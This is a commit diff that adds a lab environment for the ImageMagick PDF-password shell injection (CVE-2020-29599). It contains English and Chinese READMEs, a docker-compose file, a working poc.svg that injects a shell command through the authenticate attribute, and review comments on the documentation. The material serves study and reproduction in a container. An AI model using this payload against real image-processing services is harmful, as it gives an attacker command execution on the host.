first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary file not shown.



@@ -0,0 +1,38 @@
# ImageMagick Shell Injection via PDF Password (CVE-2020-29599)
[中文版本(Chinese version)](README.zh-cn.md)
ImageMagick is a free and open-source cross-platform software suite for displaying, creating, converting, modifying, and editing raster images.
References:
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
## Environment Setup and Exploit
Execute the following command to enter the Linux shell where Imagemagick 7.0.10-36 is installed:
```
docker compose run im bash
```
Enter the `/tmp` directory and convert the format of [poc.svg](poc.svg) to trigger the vulnerability:
```
root@f200ec9e1c1e:/# cd /tmp/
root@f200ec9e1c1e:/tmp# ls
poc.svg
root@f200ec9e1c1e:/tmp# identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003
root@f200ec9e1c1e:/tmp# convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
root@f200ec9e1c1e:/tmp# ls
0wned poc.svg
root@f200ec9e1c1e:/tmp#
```
The command `echo $(id)> ./0wned` has been executed successfully:
![](1.png)
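Review bot: the English README omits the affected version range and the one-sentence description of the flaw that the Chinese README carries (7.0.10-35 to 7.0.10-40 and 6.9.11-35 to 6.9.11-40; command injection while processing PDF input, reachable from a crafted SVG), so a reader of this file alone cannot tell why 7.0.10-36 was picked for the image or which versions need upgrading; add that paragraph after the introduction. After the transcript, one sentence should also say that the `DestroyImage` assertion and `Aborted` are the expected end of the run and that `0wned` showing up in `ls` is the indicator that the injected command ran, since the crash otherwise reads like a failed reproduction. Minor: the two untagged fences would render better with a language tag, and "Imagemagick" in the setup sentence should match the "ImageMagick" spelling used in the title.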


@@ -0,0 +1,36 @@
# Imagemagick PDF密码位置命令注入漏洞CVE-2020-29599
ImageMagick是一款使用量很广的图片处理程序很多厂商都调用了这个程序进行图片处理包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞通过构造好的SVG格式图片文件即可在Imagemagick中注入任意命令。
参考链接:
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
## 漏洞环境与复现
直接执行如下命令进入安装了Imagemagick 7.0.10-36的Linux环境
```
docker compose run im bash
```
进入`/tmp`目录,对[poc.svg](poc.svg)进行格式转换,即可触发漏洞:
```
root@f200ec9e1c1e:/# cd /tmp/
root@f200ec9e1c1e:/tmp# ls
poc.svg
root@f200ec9e1c1e:/tmp# identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003
root@f200ec9e1c1e:/tmp# convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
root@f200ec9e1c1e:/tmp# ls
0wned poc.svg
root@f200ec9e1c1e:/tmp#
```
此时命令`echo $(id)> ./0wned`已执行成功:
![](1.png)
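Review bot: the description sentence mixes an English word into the Chinese text: `6.9.11-35 up到6.9.11-40` should read `6.9.11-35到6.9.11-40`. The same paragraph gives the affected range but neither the release that fixes it nor a mitigation, so add one line naming the fixed release so readers know what to upgrade to. The English README links to this file with `[中文版本(Chinese version)](README.zh-cn.md)`, but this file has no link back; add `[English version](README.md)` under the title for symmetry.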


@@ -0,0 +1,6 @@
version: '2'
services:
im:
image: vulhub/imagemagick:7.0.10-36
volumes:
- ./poc.svg:/tmp/poc.svg
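Review bot: the top-level `version: '2'` key is obsolete in Compose v2 and prints a warning on every `docker compose run`, which is the command the README uses; drop it. The `poc.svg` bind mount needs no write access from inside the container (the injected command writes `./0wned` into the working directory, not into the mounted file), so mount it read-only: `- ./poc.svg:/tmp/poc.svg:ro`. As rendered here, `im:` and `image:` sit at the same indentation as `services:`; if that is not an artifact of the rendering, the file will not parse and the nesting under `services:` needs to be restored.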


@@ -0,0 +1,9 @@
<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
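Review bot: the inner SVG pulls the MSL script back in through `msl:poc.svg`, a relative reference, so the file only triggers when `convert` is run from the directory that contains it (hence the `cd /tmp/` at the top of the README transcript); either say so in the README or make the reference absolute (`msl:/tmp/poc.svg`) to match the compose mount. The README also presents the trigger as a plain SVG conversion, while the value that reaches the shell is the `authenticate` attribute on the outer MSL `<image>` element, carried into the `pdf:` read as the PDF password named in the title; one sentence in the README explaining that chain would tell readers why the payload sits in `authenticate` and why the script reads a file with the `pdf:` prefix.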